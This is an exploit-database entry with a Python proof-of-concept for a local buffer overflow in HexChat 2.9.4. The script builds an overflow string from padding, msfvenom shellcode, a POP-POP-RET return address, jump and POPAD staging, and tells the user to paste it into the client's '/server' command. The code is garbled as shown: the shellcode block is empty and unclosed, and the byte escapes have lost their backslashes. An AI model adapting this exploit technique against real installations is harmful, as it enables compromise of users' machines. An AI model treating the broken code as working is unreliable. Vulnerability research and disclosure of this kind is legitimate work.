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# Title : HexChat 2.9.4 Local Exploit Submission
# Published : 2013-04-07
# Author :
# Previous Title : PonyOS 0.4.99-mlp - Multiple Vulnerabilities
# Next Title : VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability

# HexChat 2.9.4 Local Exploit
# Bug found by Jules Carter < @iMulitia >
# Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com >
# http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
junk1 = "B"*30
shellcode = (
# msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c
junk2 = "A"*(13306-len(shellcode))
stage1 = "x4cx4cx77x21" # 21 byte jump (JA)
ret = "x63x64x62x68" # ASCII PPR
junk3 = "C"*29
stage2 = "x61"*38 # POPAD x 38
stage2 += "x54" # PUSH ESP
stage2 += "xE9" # RETN # This byte is a bad char, but gets converted to RETN and x88
junk4 = "D"*11586

print "Copy this text, and enter into HexChat's textbox: "/server [string]"" 
print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4